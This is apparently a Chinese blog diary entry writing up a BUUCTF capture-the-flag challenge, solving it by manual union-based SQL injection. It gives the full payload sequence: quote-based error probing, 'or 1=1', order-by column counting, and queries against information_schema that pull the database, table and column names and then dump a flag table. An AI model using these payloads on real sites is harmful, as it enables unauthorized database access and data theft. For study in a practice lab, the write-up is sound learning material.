BUUCTF刷题系列(1)5.25日记
前面的题目都不太难,就直接从SQL注入开始了。
这个样子的话,明显就是注入,我们先拿出SQL语句:http://fb415201-6634-4fc3-a6bc-a67b84ea1ed2.node3.buuoj.cn/index.php?id=1
1‘报错
1' or 1=1 --+ 正常,Ok随后order by 到3没问题 4就报错
注:没显示什么就是报错了。
order by主要是用来查看这个注入点网页显示多少字段,比如order by9不报错,order by10报错,那么这个网页就有9个字段,最后手动爆库的时候,union select 1,2,3,4,5,7,8,9
接下来我们开始查库查表查字段
查库名
payload:?id=-1' union select 1,database(),3 --+
回显说数据库名就是 note
查表名
?id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='note' limit 0,1 --+
?id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='note' limit 1,1 --+
相比之下 fl4g更可疑一些,先查一下它的字段
payload:?id=-1' union select 1,database(), group_concat(column_name) from information_schema.columns where table_name='fl4g' --+
成功得到列名
查询字段
payload:?id=-1' union select 1,database(), group_concat(fllllag) from fl4g --+
得到flag了!
最新文章
- 微软新神器-Power BI横空出世,一个简单易用,还用得起的BI产品,你还在等什么???
- 高可用Hadoop平台-Flume NG实战图解篇
- 菜鸟学Linux命令:tar命令 压缩与解压缩
- 【读书笔记】iOS-GCD-block
- Ubuntu 创建快捷方式的方法
- qml+opencv(二),实现人脸检测
- Android中View绘制优化之三---- 优化View
- iOS中的定时器
- [算法专题] stack
- Oracle的字符连接函数 concat 和 || 的区别
- Getting started with Processing 第六章总结
- PHP+Oracle Instant Client
- 55. Jump Game(贪心)
- Halcon开发环境和数据结构介绍——第1讲
- SLAM FOR DUMMIES 第5-8章 中文翻译
- win10系统的快捷键
- cmd编译java程序出现:找不到或无法加载主类的原因以及解决办法 以及 给java的main方法传递args参数
- MyBatis初识(通过小实例清晰认识MyBatis)
- 不可逆转(SDOI2010地精部落)
- PAT A1127 ZigZagging on a Tree (30 分)